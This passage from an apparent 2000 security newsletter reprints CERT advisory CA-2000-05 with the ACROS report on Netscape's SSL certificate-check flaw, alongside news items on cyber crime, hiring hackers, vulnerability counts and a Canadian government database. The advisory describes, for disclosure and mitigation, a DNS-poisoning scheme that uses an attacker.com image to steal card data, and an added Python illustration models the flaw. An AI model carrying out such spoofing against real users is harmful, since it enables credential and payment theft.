http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This
includes instructions for press inquiries regarding Cisco security
notices.
@HWA
211.0 [HNS] May 22:INDIA AND CYBER CRIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Monday 22 May 2000 on 7:11 PM
The Times of India published an article about cyber crime, where they
mention trojan horses as "cyber terrorism weapons". Another part of the
article speaks of what the police would do to fight cyber crime.
"The police headquarters here has just two Internet connections. And
only 30 officers were introduced to a beginners' guide to computers
early this year"...
Link: The Times of India
http://www.timesofindia.com/210500/21home5.htm
@HWA
212.0 [IND] CERT® Advisory CA-2000-05 NS Improper SSL validation
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Netscape Navigator Improperly Validates SSL Sessions
http://www.cert.org/advisories/CA-2000-05.html
CERT® Advisory CA-2000-05 Netscape Navigator Improperly Validates
SSL Sessions
Original release date: May 12, 2000
Source: ACROS, CERT/CC
A complete revision history is at the end of this file.
Systems Affected
Systems running Netscape Navigator 4.72, 4.61, and 4.07. Other versions less
than 4.72 are likely to be affected as well.
Overview
The ACROS Security Team of Slovenia has discovered a flaw in the way Netscape
Navigator validates SSL sessions.
I. Description
The text of the advisory from ACROS is included below. It includes information
CERT/CC would not ordinarily publish, including specific site names and exploit
information. However, because it is already public, we are including it here as
part of the complete text provided by ACROS.
=====[BEGIN-ACROS-REPORT]=====
=========================================================================
ACROS Security Problem Report #2000-04-06-1-PUB
-------------------------------------------------------------------------
Bypassing Warnings For Invalid SSL Certificates In Netscape Navigator
=========================================================================
FULL REPORT PUBLIC
======
Affected System(s): Netscape Navigator & Communicator
Problem: Bypassing Warnings For Invalid SSL Certificates
Severity: High
Solution: Installing the Personal Security Manager or
Installing the newest Netscape Communicator (v4.73)
Discovered: April 3, 2000
Vendor notified: April 4, 2000
Last update: May 10, 2000
Published: May 10, 2000
SUMMARY
=======
Our team has discovered a flaw in Netscape Navigator that allows bypassing
of warning about an invalid SSL certificate. SSL protection is used in most
major Internet-based financial services (e-banking, e-commerce). The flaw
we have found effectively disables one of the two basic SSL functionalities:
to assure users that they are really communicating with the intended web
server - and not with a fake one.
Using this flaw, the attacker can make users send secret information (like
credit card data and passwords) to his web server rather than the real one -
EVEN IF THE COMMUNICATION IS PROTECTED BY SSL PROTOCOL.
INTRODUCTION (skip this section if you already understand how SSL works)
============
When a web browser tries to connect to a SSL-protected server, a so-called
SSL session is established. At the beginning of this session the server
presents his SSL certificate containing his public key. At this point,
browser checks the certificate for the following conditions (*):
1) Certificate must be issued by a certificate authority trusted by browser
(some are default: Verisign, Thawte etc.)
2) Certificate must not be expired (its expiry date:time must be later than
the current system date:time on the computer browser is running on)
3) Certificate must be for the server that browser is connecting to (if
browser is connecting to www.e-bank.com, the certificate must be for
www.e-bank.com)
All three conditions must be met for browser to accept the certificate. For
every condition not met, browser should display a warning to the user and
then user can decide whether connection should be established or not.
These three conditions combined provide user with assurance that his browser
is really connecting to the correct server and not to some fake server
placed on the Internet by malicious individual(s) trying to trick users to
give them credit card information, passwords and other secret information.
For example, let's take a look at a sample web e-banking system that doesn't
use SSL certificates and requires one-time password tokens for user
authentication. User connects to http://www.e-bank.com. Browser asks DNS
server for IP address of www.e-bank.com and gets 100.100.100.100. Browser
then connects to 100.100.100.100 and user is presented with login form
asking for his username and one-time password. He enters this data and
starts using e-banking services.
A simple attack (called web-spoofing) on this system is to attack the DNS
server and "poison" its entry for www.e-bank.com with attacker's IP address
99.99.99.99. Attacker sets up a web server at 99.99.99.99 that web-wise
looks exactly like the original www.e-bank.com server. User trying to
connect to www.e-bank.com will now instead connect to the attacker's server
and provide it with his one-time password. Attacker's server will use this
password to connect to the real server at 100.100.100.100 and transfer all
of the user's money to his secret Swiss bank account ;-).
This attack is successfully disabled by using SSL protocol. In that
case, when browser falsely connects to www.e-bank.com at 99.99.99.99 rather
than to 100.100.100.100, attacker's server must provide a valid certificate
for www.e-bank.com, which it can't unless the attacker has stolen the secret
key and the certificate from the real server. Let's look at three
possibilities:
1) Attacker could issue a certificate for www.e-bank.com himself (on his own
CA). That wouldn't work since his CA is not trusted by user's browser.
2) Attacker could use a stolen expired key and certificate (those are often
not protected as strongly as valid ones since one could think they can't
be used any more). That wouldn't work since browser will notice that
certificate is expired.
3) Attacker could use a valid key and certificate for some other site (e.g.
www.something.org). That wouldn't work since browser will accept only
valid certificates for www.e-bank.com.
It would seem that this problem of web-spoofing is successfully solved with
SSL certificates.
PROBLEM
=======
There is a flaw in implementation of SSL certificate checks in Netscape
Navigator.
The Flaw
--------
Netscape Navigator correctly checks the certificate conditions (*) at the
beginning of a SSL session it establishes with a certain web server.
The flaw is, while this SSL session is still alive, all HTTPS
connections to *THAT SERVER'S IP ADDRESS* are assumed to be a part of this
session (and therefore certificate conditions are not checked again).
Instead of comparing hostnames to those of currently open sessions, Navigator
compares IP addresses. Since more than one hostname can have the same IP
address, there is a great potential for security breach.
This behavior is not in compliance with SSL specification.
DEMONSTRATION
=============
The following will try to demonstrate the flaw. It is assumed that for
redirecting user's web traffic, the attacker will generally use "DNS
poisoning" or reconfiguring routers, while in our demonstration we will
use the HOSTS file on client computer to get the same effect and make it
easier to reproduce the flaw.
In this demonstration, we will make Navigator open Thawte's homepage over
secure (HTTPS) connection while requesting Verisign's home address at
https://www.verisign.com.
Thawte's and Verisign's homepages are used as examples - this would work
just the same on any other secured web sites.
1) First, add the following line to the local HOSTS file on the computer
running the Navigator and save it:
207.240.177.177 www.verisign.com
This will make the computer (and, consequently, the browser) think that IP
address of www.verisign.com (which is actually 205.139.94.60) is in fact
207.240.177.177 (which is actually IP address of www.thawte.com).
At this point it is important to note that SSL, if correctly implemented,
provides protection against such "domain name spoofing", because while the
browser will connect to the wrong server, that server will not be able to
provide a valid SSL certificate and the SSL session will not be
established (not without user being warned about the certificate).
2) Close all instances of Navigator to clean any cached IP addresses.
3) Open Navigator and go to https://www.thawte.com. It works as it should -
Thawte's server provides a valid SSL certificate for its hostname
(www.thawte.com) and so the SSL session is established.
4) With the same instance of Navigator, go to https://www.verisign.com. Now
watch the Thawte's homepage appear again WITHOUT ANY WARNINGS!
What happened here? In step 3), Navigator looked up the IP address for
www.thawte.com (from the DNS server) and found 207.240.177.177. It tried to
establish a SSL session with that IP address and correctly checked all three
certificate conditions (*) - indeed, if any of them weren't true, a warning
would pop up.
In step 4), Navigator looked up the IP address for www.verisign.com (this
time from HOSTS file, but it could easily have been from the same DNS server)
and found again 207.240.177.177. Now, since there was already one SSL session
open with that IP address, Navigator *INCORRECTLY* decided to use that
session instead of establishing another one.
EXPLOIT
=======
This exploit will show how the flaw could be used to gather user's secret
information.
Assume there is a web bookstore at www.thebookstore.com. Users go to
http://www.thebookstore.com (via normal HTTP connection), browse the
books and add them to their virtual shopping baskets. At the check-out,
they are directed to a secure order form (e.g.
https://www.thebookstore.com/order_form.html) where they enter their
personal and credit card information which is then submitted (again via
secure HTTPS connection) to the server. This is a typical web e-commerce
concept.
Assume that IP address of www.thebookstore.com is 100.100.100.100.
The attacker sets up his own web server with IP address 99.99.99.99 and
installs on it a valid SSL certificate for host www.attacker.com (he could
have purchased this certificate from e.g. Verisign if he owns the domain
attacker.com; he could have stolen the certificate or he could have broken
into a web server with a certificate already installed).
The attacker makes this web server function as a gateway to
www.thebookstore.com - meaning that all requests are forwarded to
www.thebookstore.com, so virtually this server "looks and feels" exactly like
the real www.thebookstore.com. There is just one difference: the page before
the order form (e.g. http://www.thebookstore.com/basket.html)
contains a small (1x1) image originating from https://www.attacker.com
(secure HTTPS connection).
Then, the attacker "poisons" a heavily used DNS server so that it will return
99.99.99.99 for requests about www.thebookstore.com (normally it returns
100.100.100.100).
What happens then?
All users of that DNS server who will try to visit (via normal HTTP)
http://www.thebookstore.com will connect to 99.99.99.99 instead of
100.100.100.100 but will not notice anything because everything will look
just the way it should. They will browse the books and add them to their
shopping baskets and at check-out, they will be presented with the order form
https://www.thebookstore.com/order_form.html.
But the previous HTML page containing the hyperlink to the order form will
also contain a small (1x1) image with source https://www.attacker.com/a.gif.
Navigator will successfully download this image and for that it will
establish a SSL session with www.attacker.com. This session then stays open.
When the order form is accessed, Navigator tries to establish another SSL
session, this time to www.thebookstore.com. Since DNS server claims this
server has the same IP address as www.attacker.com (99.99.99.99), Navigator
will use the existing SSL session with 99.99.99.99 and will not check the
certificate.
The result: Navigator is displaying a SECURE ORDER FORM that it believes to
be originating from the genuine server www.thebookstore.com while in fact
it is originating from the fake one. No warning about an invalid certificate
is issued to the user so he also believes to be safe.
When user submits his secret information, it goes to (through) the attacker's
server where it is collected for massive abuse.
For users to notice the foul play they would have to look at the certificate
properties while on a "secure" page https://www.thebookstore.com/...
The properties would show that the certificate used was issued for host
www.attacker.com.
Also, monitoring network traffic would show that the server is not at
100.100.100.100 where it should be but rather at 99.99.99.99.
It is a very rare practice to check any of these when nothing suspect is
happening.
Notes
-----
It should be noted that in the previous exploit, if the users tried to
access https://www.thebookstore.com over secure (HTTPS) connection from
the very start, Navigator would issue a warning. It is imperative for the
exploit to work that some time *before* the first secure connection to
https://www.thebookstore.com a successful secure connection is made to
https://www.attacker.com. That's why a valid certificate must be installed
on www.attacker.com.
Also, it should be noted that Navigator's SSL sessions don't last forever.
We haven't been able to predict the duration of these sessions
(it seems to be depending on many things like inactivity time, total time
etc.) and we also haven't investigated the possible effects of SSL
session resuming.
SOLUTION
========
Netscape has (even prior to our notification - see the Acknowledgments
section) provided a Navigator Add-on called Personal Security Manager (PSM),
freely downloadable at:
http://www.iplanet.com/downloads/download/detail_128_316.html
Installation of PSM, as far as we have tested it, corrects the identified
flaw.
Netscape Communicator (v4.73) currently includes the fix for this
vulnerability. It is available for download at:
http://home.netscape.com/download/
WORKAROUND
==========
Navigator/Communicator users who can't or don't want to install PSM can use
a "manual" method to make sure they are not under attack:
When visiting an SSL-protected site, double click on the lock icon (bottom
left corner) or the key icon (in older browsers) and see whether the
certificate used for the connection is really issued for the correct
hostname. E.g. If you visit https://www.verisign.com, make sure the
certificate used is issued for www.verisign.com and not for some other
hostname.
ADVISORY
========
It is important to emphasize that the flaw presented completely compromises
SSL's ability to provide strong server authentication and therefore poses
a serious threat to Navigator users relying on its SSL protection.
Users of web services
---------------------
Netscape Navigator/Communicator users who are also users of any critical web
services employing Secure Sockets Layer (SSL) protection to provide secrecy
and integrity of browser-server communication are strongly advised to
install Personal Security Manager or upgrade to Communicator 4.73 and thus
disable this vulnerability.
Main examples of such critical web services are:
- web banking systems (especially the ones using passwords for
authentication - even one-time passwords),
- web stores (especially the ones accepting credit card data) and
- other web-based e-commerce systems.
Providers of web services
-------------------------
Providers of critical web services employing Secure Sockets Layer (SSL)
protection to provide secrecy and integrity of browser-server communication
should advise their users to install Personal Security Manager or upgrade to
Communicator 4.73 and thus disable this vulnerability.
Since this vulnerability allows for the type of attack that can completely
bypass the real/original web server, there are no technical countermeasures
which providers of web services could deploy at their sites.
Web services using client SSL certificates for user authentication
------------------------------------------------------------------
This vulnerability does NOT allow the attacker to steal client's SSL key
and thus execute the man-in-the-middle attack on web services using client
SSL certificates for user authentication. It still does, however, allow
the attacker to place a fake server (an exact copy) and collect other
information users provide (including the data in their client SSL
certificates).
TESTING RESULTS
===============
Tests were performed on:
Communicator 4.72 - affected
Communicator 4.61 - affected
Navigator 4.07 - affected
ACKNOWLEDGMENTS
===============
We would like to acknowledge Netscape (specifically Mr. Bob Lord and Mr.
Kevin Murray) for prompt and professional response to our notification of
the identified vulnerability and their help in understanding the flaw and
"polishing" this report.
We would also like to acknowledge Mr. Matthias Suencksen of Germany, who
has discovered some aspects of this vulnerability before we did (back in
May 1999).
REFERENCES
==========
Netscape has issued a Security Note about this vulnerability under a title
"The Acros-Suencksen SSL Vulnerability" at:
http://home.netscape.com/security/notes/index.html
SUPPORT
=======
For further details about this issue please contact:
Mr. Mitja Kolsek
ACROS, d.o.o.
Stantetova 4
SI - 2000 Maribor, Slovenia
phone: +386 41 720 908
e-mail: mitja.kolsek@acros.si
PGP Key available at PGP.COM's key server.
PGP Fingerprint: A655 F61C 5103 F561 6D30 AAB2 2DD1 562A
DISTRIBUTION
============
This report was sent to:
- BugTraq mailing list
- NTBugTraq mailing list
- Win2KSecAdvice mailing list
- SI-CERT
- ACROS client mailing list
DISCLAIMER
==========
The information in this report is purely informational and meant only for
the purpose of education and protection. ACROS, d.o.o. shall in no event be
liable for any damage whatsoever, direct or implied, arising from use or
spread of this information.
All identifiers (hostnames, IP addresses, company names, individual names
etc.) used in examples and exploits are used only for explanatory purposes
and have no connection with any real host, company or individual. In no
event should it be assumed that use of these names means specific hosts,
companies or individuals are vulnerable to any attacks nor does it mean that
they consent to being used in any vulnerability tests.
The use of information in this report is entirely at user's risk.
COPYRIGHT
=========
(c) 2000 ACROS, d.o.o., Slovenia. Forwarding and publishing of this document
is permitted providing all information between marks "[BEGIN-ACROS-REPORT]"
and "[END-ACROS-REPORT]" remains unchanged.
=====[END-ACROS-REPORT]=====
II. Impact
Attackers can trick users into disclosing information (potentially
including credit card numbers, personal data, or other sensitive
information) intended for a legitimate web site, even if that web
site uses SSL to authenticate and secure transactions.
III. Solution
Install an update from your vendor.
Appendix A lists information from vendors about updates.
If you are a DNS administrator, maintain the integrity of your DNS
server
One way to exploit this vulnerability, described above, relies on the
ability of the attacker to compromise DNS information. If you are a
DNS administrator, making sure your DNS server is up-to-date and free
of known vulnerabilities reduces the ability of an intruder to execute
this type of attack. Administrators of BIND DNS servers are encouraged
to read
http://www.cert.org/advisories/CA-2000-03.html
Validate certificates at each use
Despite the existence of this flaw, it is still possible to guard
against attempted attacks by validating certificates manually each
time you connect to an SSL-secured web site. Doing so will substantially
reduce the ability of an attacker to use flaws in the DNS system to
bypass SSL-authentication.
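
The session-reuse flaw ACROS describes and the check-at-each-use advice above, modelled as an added example (not code from Netscape, ACROS or CERT/CC): a session cache keyed by IP address beside one keyed by hostname, run against the report's poisoned-DNS scenario. The class and function names, the CA name and the dates are constructed for illustration, and the model ignores ports and session expiry.

```python
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample values; hostnames and addresses are the report's examples.
NOW = datetime(2000, 5, 12, tzinfo=timezone.utc)
TRUSTED_ISSUERS = {"Example Trusted CA"}  # hypothetical CA name


@dataclass(frozen=True)
class Cert:
    subject: str         # hostname the certificate was issued for
    issuer: str          # certificate authority that signed it
    not_after: datetime  # expiry date:time


def check_certificate(cert, hostname, now):
    """Apply the report's three conditions (*); return the ones that fail."""
    problems = []
    if cert.issuer not in TRUSTED_ISSUERS:
        problems.append("untrusted issuer")
    if cert.not_after <= now:
        problems.append("expired")
    if cert.subject.lower() != hostname.lower():
        problems.append("hostname mismatch")
    return problems


class Browser:
    """Toy HTTPS client whose session cache is keyed by 'ip' or by 'host'."""

    def __init__(self, dns, servers, key_by):
        self.dns = dns          # hostname -> IP, possibly poisoned
        self.servers = servers  # IP -> certificate that server presents
        self.key_by = key_by    # "ip" models the flaw, "host" the fix
        self.sessions = {}      # open sessions, by cache key

    def connect_https(self, hostname, now=NOW):
        ip = self.dns[hostname]
        key = ip if self.key_by == "ip" else hostname.lower()
        if key in self.sessions:
            # Existing session is reused: the certificate is NOT re-checked.
            return ("reused", [])
        problems = check_certificate(self.servers[ip], hostname, now)
        if problems:
            # A real browser would warn the user here and let them decide.
            return ("warning", problems)
        self.sessions[key] = ip
        return ("established", [])


def make_browser(key_by):
    """Client behind a DNS server poisoned as in the report's scenario."""
    attacker_cert = Cert(
        subject="www.attacker.com",
        issuer="Example Trusted CA",
        not_after=datetime(2001, 1, 1, tzinfo=timezone.utc),
    )
    dns = {
        "www.attacker.com": "99.99.99.99",
        "www.thebookstore.com": "99.99.99.99",  # really 100.100.100.100
    }
    servers = {"99.99.99.99": attacker_cert}
    return Browser(dns, servers, key_by)


def run_scenario(key_by):
    """1x1 image from www.attacker.com first, then the secure order form."""
    browser = make_browser(key_by)
    return [
        browser.connect_https("www.attacker.com"),
        browser.connect_https("www.thebookstore.com"),
    ]


if __name__ == "__main__":
    for mode in ("ip", "host"):
        print(mode, run_scenario(mode))
```

With the cache keyed by IP address the second connection is reused without any check; keyed by hostname, the same sequence produces the hostname-mismatch warning the report says a correct implementation must show.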
Appendix A. Vendor Information
iPlanet
Information about this problem is available at
http://home.netscape.com/security/notes/index.html
Microsoft
None of our products are affected by this vulnerability.
The CERT Coordination Center thanks the ACROS Security Team of Slovenia
(Contact: mitja.kolsek@acros.si), for the bulk of the text in this advisory.
Shawn Hernan was the primary author of the CERT/CC portions of this document.
This document is available from: http://www.cert.org/advisories/CA-2000-05.html
CERT/CC Contact Information
Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.
CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday
through Friday; they are on call for emergencies during other hours, on U.S.
holidays, and on weekends.
Using encryption
We strongly urge you to encrypt sensitive information sent by email. Our public
PGP key is available from
http://www.cert.org/CERT_PGP.key
If you prefer to use DES, please call the CERT hotline for more information.
Getting security information
CERT publications and other security information are available from our web site
http://www.cert.org/
To be added to our mailing list for advisories and bulletins, send email to
cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the
subject of your message.
* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and
Trademark Office.
NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering
Institute is furnished on an "as is" basis. Carnegie Mellon University makes no
warranties of any kind, either expressed or implied as to any matter including,
but not limited to, warranty of fitness for a particular purpose or merchantability,
exclusivity or results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from patent, trademark,
or copyright infringement.
Conditions for use, disclaimers, and sponsorship information
Copyright 2000 Carnegie Mellon University; portions Copyright 2000 ACROS, d.o.o., Slovenia.
Revision History
May 12, 2000: Initial release
@HWA
213.0 [MM] IBM will only hire imitation hackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Packetstorm and ZDNet
http://www.anchordesk.co.uk/anchordesk/commentary/columns/0,2415,7102547,00.html
May 16, 2000
IBM will only hire imitation hackers
David Binney, director of corporate security for IBM stated, "IBM would never consider hiring a
reformed hacker. It would be like hiring a burglar to institute a burglar system in your house. You
wouldn't do it." When Lewis Koch, a journalist with ZDNET UK, attempted to ascertain if there
were any ulterior motives for the statement, Binney backed out of the interview. Read the entire
story (below). Thanks to Jane Oliver at ZDNET for the submission.
- Packetstorm
ZDnet;
Commentary Box
May 15, 2000
What the hack did he say?
"IBM would never consider hiring a reformed
hacker. It would be like hiring a burglar to
institute a burglar system on your house. You
wouldn't do it." So said David Binney, director of
corporate security at IBM, in Solar Sunrise, a
video produced last year by the Federal Bureau of
Investigation and the National Infrastructure
Protection Center, ostensibly to deter people from
hacking.
By Lewis Z. Koch
In Binney's view, hackers, like burglars, break in with the intent to
steal. IBM won't hire you, he said, and neither will any responsible
computer security firm. Hack and you'll never work in this town again.
Don't believe it, Binney. The town and the times are a-changin'.
Testing the thesis
A number of top-tier, high-profile firms feel differently about hackers.
Evidence? Look at the recent joint venture among a group of hackers
known as the L0pht, Compaq Computer and Forrester Research that
involves $10 million in venture capital. There's nothing "reformed"
about the L0pht; members wear the mantle of hacker proudly, says
Space Rogue, a L0pht member in good standing.
Although not a hacker, reformed or otherwise, Steve Lutz,
president of WaySecure Consulting, hires reformed hackers. His
company offers a full range of computer security consulting, including
evidence gathering, risk assessment, security testing and training.
Among the hundreds of clients he and his hackers have served are
Chase Manhattan, American Express, Morgan Stanley Dean Witter,
insurance giant Transamerica, TIAA-CREF, the U.S. Navy and the
U.S. Army - organisations with serious items to protect: money,
stocks, bombs.
"I hired several hackers," Lutz says, "the most famous, perhaps
notorious, being Mark Abene, a.k.a. Phiber Optik. I brought Mark into
the security consulting world by hiring him when he was released
from prison. He worked for me for about two years and then started
his own company, called Crossbar Security. Mark is a perfect
example of the nation's most feared hacker turning around and
providing a valuable service to the commercial sector and reaping the
rewards that go with it."
Lutz says hiring hackers as consultants can be "highly rewarding.
This is true for both the clients we serve and... the hackers
themselves. Many young, talented hackers are bored and looking for
something to do. By providing them with a constructive objective and
rewarding them monetarily, we help focus them in a positive direction
that keeps them busy and out of trouble."
The idea, as Lutz sees it, is to manage them and teach them
business skills, not banish or outlaw them.
Inquiring minds
Could Binney have had an ulterior motive for his statement? IBM has
what it calls an "ethical hackers" unit that will, for $15,000 to
$40,000, according to the company, "simulate a real intruder's
attack, but in a controlled, safe way." IBM's Internet Security
Assessments, for $40,000 to $200,000, will tell companies if their
Web sites are vulnerable and, if so, shore the sites up.
I asked computer security people all over the Net what they would
like me to ask Binney. But after initially agreeing to an interview on
Feb. 8, Binney changed his mind and has since been unavailable for
comment, despite numerous phone calls, messages and e-mails.
The questions, though, have value in themselves...
Carole Fennelly is a security consultant and partner at Wizard's
Keys, a Tinton Falls, N.J., consulting company specializing in
computer systems security. Fennelly had three sets of questions:
1. If IBM doesn't use hackers for penetration tests, then what is
so special about its test? If it is merely testing for known
vulnerabilities using a package like ISS Scanner [which
uncovers vulnerabilities likely to be exploited during attempts
to attack a network and provides the necessary corrective
actions], why should a company pay big bucks for that? Why
couldn't companies just run the scan themselves?
2. Has IBM ever encountered a site with really iron-clad
security? If so, what did IBM put in the report? IBM can
answer that one without naming the company, just as
physicians mask the identities of their patients, while still
providing the data necessary for studies.
3. When IBM makes recommendations, does it refer the client to
a vendor with which it has a partnership? Does it offer to do
the work itself? They're not using the audit as a marketing
opportunity, are they? Audits can be legitimate opportunities
for a company to prove its worth to the client. It can also
become a con job targeting overworked and understaffed
technical administrators.
Sage security advice
Matthew G. Devost, a senior information security analyst at Security
Design International, a firm providing security consulting services to
international corporations and governments, warns against using
large firms that offer prepackaged security solutions. "With large
consulting or product companies, the security consulting team is
often used as a mechanism for pushing other products or services,"
Devost says.
He also cautioned against an assessment team that benefits from
future product sales or follow-up implementation support. "Pay close
attention to methodology," Devost says. "If a company offers a quote
without first understanding your network, their assessment can't
really be trusted."
Other things that don't bode well, Devost says, are the use of a
single commercial product or reliance on assessment tools.
Devost says customers should check the qualifications of the
security team. "Will the names provided be directly involved in your
assessment? Beware the bait-and-switch technique, where a team of
senior security engineers is offered up, but replaced by a team of
recent college graduates at the last minute."
Cast a wide net, Devost says. "There are a hundred reasons why
you should avoid using a large consulting company to perform a
security assessment... [which] will become apparent only when you
broaden the spectrum of firms you solicit for quotes. Pay very close
attention to the technical substance of their proposals."
So, contrary to what Binney said, with all the problems around the
Internet - denial-of-service attacks out of nowhere, computer
malfunctions and software vulnerabilities - there is a growing market
for reformed hackers, one that's lucrative and fun and, best of all,
legal.
If you want to respond to this piece, talk to the author, voice an
opinion or just tell us how we can improve AnchorDesk UK, come to
our TalkBack forums and have your say ...
@HWA
214.0 [IND] BUGTRAQ: "Vulnerability statistics database"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.securityfocus.com/frames/?content=/vdb/stats.html
This is interesting, but I feel they should have included more relevant
information like how many units are in production use and how many units
are home or business based etc in this analysis. - Ed
Follow url for more stats and graphs etc.
Number of OS Vulnerabilities by Year
OS                    1997  1998  1999  2000
Debian                   2     2    29     5
FreeBSD                  4     2    18     6
HP-UX                    8     5     7     3
IRIX                    26    13     8     3
Linux (aggr.)           10    23    84    30
MacOS                    0     1     5     0
MacOS X Server           0     0     1     0
NetBSD                   1     4    10     3
OpenBSD                  1     2     4     2
RedHat                   5    10    38    17
Solaris                 24    31    34     6
Windows 3.1x/95/98       1     1    46    11
Windows NT               4     6    99    34
@HWA
215.0 [MM] Big Brother has your file
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.canoe.ca/TorontoNews/ts.ts-05-17-0016.html
Wednesday, May 17, 2000
Big Brother has your file
Huge data bank worries privacy watchdog
By SEAN DURKAN, OTTAWA BUREAU
OTTAWA -- Big Brother is watching you.
The federal government has "a de facto citizen profile" on virtually
everyone living in Canada, Privacy Commissioner Bruce Phillips
revealed yesterday.
The massive data bank, which is vulnerable to misuse, is run by
Jane Stewart's Human Resources and Development Canada --
the same department under fire for its handling of $1 billion in job
grants.
The data bank contains as many as 2,000 pieces of information on
each of 33.7 million individuals, Phillips said in his annual report to
Parliament.
The dossier, which tracks Canadians from cradle to grave and is
never purged, includes information about each person's education,
marital status, ethnic origin, mobility, disabilities, income tax,
employment and welfare history.
TAX RETURNS
The information is taken from income tax returns, child tax
benefits, immigration and welfare files, the National Training
Program, Canadian Job Strategy, employment services,
employment insurance, job records and the social insurance
master file.
"Continually centralizing and integrating so much personal data on
almost every person in Canada poses significant risks to our
privacy," Phillips said.
Privacy is further endangered because the information can be
given out to non-government researchers, Phillips said.
Most Canadians would be surprised to know their tax returns can
be shared in this way, he said.
HRDC's files are not subject to laws preventing the public release
of any individual's information.
Phillips said the database is "a hazard" because it creates a
temptation for governments to develop profiles, "raising fears that
data could be used to make decisions or predictions about
individuals ... to the detriment of individual rights."
ASSURANCES
Privacy commissioners have always assured Canadians there was
no such central file. An audit which began two years ago has
proved them wrong and Canadians should be concerned, Phillips
said.
The "extraordinarily detailed" central databank is called the
Longitudinal Labour Force File.
There are proposals to make the file even more comprehensive by
adding data on social assistance recipients from additional
provinces and territories, and data from the Canada Student Loan
Program, the Canada Pension Plan and the Old Age Security
Program.
The central file has gradually built up with government
reorganization, which has turned HRDC into "a virtual behemoth"
that has taken over numerous social, employment and training
programs from other departments.
Phillips said HRDC has responded to his concerns by saying the
data is vital to help it develop policy, manage the effectiveness of
its "interventions" and improve programs and service delivery.
-=-
Ottawa Citizen;
http://www.ottawacitizen.com/national/000517/4116449.html
Vast database details every Canadian's life
Federal watchdog says some files hold 2,000 bits of information
Ian MacLeod
The Ottawa Citizen
The federal government has quietly created a massive computer database with
intimate details about millions of Canadians, including income, employment,
education and family status, federal Privacy Commissioner Bruce Phillips
revealed yesterday.
"This is an enormous database with enormous amounts of information about each
one of us," the nation's chief privacy watchdog said following the release of
his annual report to Parliament on the state of personal privacy in Canada.
"Every one of us is covered in this file in one way or another. They have a
complete record of you if you've had any contact anywhere with any (of a
number of government departments and programs) ... which tells them how
your life is progressing."
The Longitudinal Labour Force File, managed by Human Resources
Development Canada, contains detailed data on 33.7 million living and dead
Canadians. Some individual files contain as many as 2,000 bits and pieces of
vital personal information, Mr. Phillips said.
The labour file was established about 15 years ago by Employment and
Immigration Canada and is used to research and evaluate the effectiveness of
the federal employment insurance program.
The information is gleaned from other government data banks and includes
details from tax returns, child tax benefit files, provincial and municipal
welfare files, federal jobs, job training and employment programs and
services, employment insurance files and the social insurance master file.
Mr. Phillips said there are proposals to expand the file to include additional
data on social assistance recipients from provinces and territories, the
Canada Student Loan Program, the Canada Pension Plan and Old Age
Security Program.
"Successive privacy commissioners have assured Canadians that there was
no single federal government file, or profile about them," said Mr. Phillips.
"We were wrong -- or not right enough for comfort.
"I don't question that they had, and they have, good reasons for doing this
and that it is useful information in terms of improving the quality of their
programs. I am not suggesting either that they've done anything unlawful
here. They are complying with the strict letter of the law as we understand it.
"But there are serious problems here."
Although an HRDC Web site contains a brief description about the labour
file, Mr. Phillips said much more has to be done to let Canadians know
about the extent of the government's surveillance of its citizens.
"Transparency and knowledge about what the government is doing is
important."
A senior HRDC official yesterday defended the file and said the department
has been trying to address Mr. Phillips' concerns, including agreeing to purge
individual data from the file after 25 years.
"We have taken his concerns seriously," said Bob Wilson, HRDC's
director-general of evaluation and data development. "We're not unmindful
of the privacy concerns surrounding the database.
"On the other hand, it's really important to Canadians that we do policy
research and evaluation so that we can get programs that meet their needs.
So, as in all of these thorny public policy issues, there's a saw-off about
where do you draw the line in respect of that."
He said specific information in the database is electronically masked to hide
an individual's identity and that only a handful of HRDC officials have access
to the technological hardware needed to unmask the data. He acknowledged
the masked data is sometimes given to private firms for research and
analysis.
"We're concerned about maintaining the privacy of individuals and we've
done a large number of things to protect that," said Mr. Wilson. "We,
perhaps not wisely, but nevertheless, have relied on the fact that we've been
doing this for 15 years and never had a problem with it, never had even a
hint of a (security) breach."
Mr. Phillips said he has no reason to believe current government officials are
abusing the information contained in the file, though he questions what future
officials might do and whether any officials really need all of the information
the file contains.
In effect, he said, the government is compiling a de facto profile of virtually
every citizen in Canada.
"My problem here is ... the Privacy Act at the moment is insufficient to
prevent these kinds of informational collections," he said. "The Canadian
public believes, for example, that when they send their tax information, it
doesn't go out of the tax department. Well, in fact, it does, many times and
to many places. There's something like 200 informational exchange
agreements between Revenue Canada and various other agencies, plus other
governments."
In the two years since the Office of the Privacy Commissioner found out
about the labour file, Mr. Phillips said he has tried, unsuccessfully, to
persuade HRDC officials to enact legislation to control the collection,
handling and access to the information.
"I said years ago, the fear is not Big Brother, it's thousands of little brothers,
all of whom have" increasing technological ability to monitor the personal
lives of Canadians.
"But there is a Big Brother factor as well, and I think the Longitudinal Labour
Force File is an example of the kind of thing that modern technology makes
possible. We should know about it. We should know they're doing it and
they should have to do it under very tightly written legal restraints about the
usage of that information."
But Mr. Wilson said HRDC officials believe current laws and regulations
offer many of the protections Mr. Phillips wants.
"We really need to sit down with him to find out exactly what he would like
us to do by way of legislative framework," he said.
Longitudinal Labour Force File
Description: The bank contains all of the following information: Social
Insurance Number, sex, date of birth, name and initials of the person. It may
contain information on income, periods of employment and unemployment,
eligibility of employment insurance and or social assistance, family situation,
education, National Training Program courses taken and other employment
services received.
Consistent Use: ...It may be provided to private sector firms for planning,
statistics, research and situations.
@HWA
216.0 [MM] Napster gets tough with Metallica
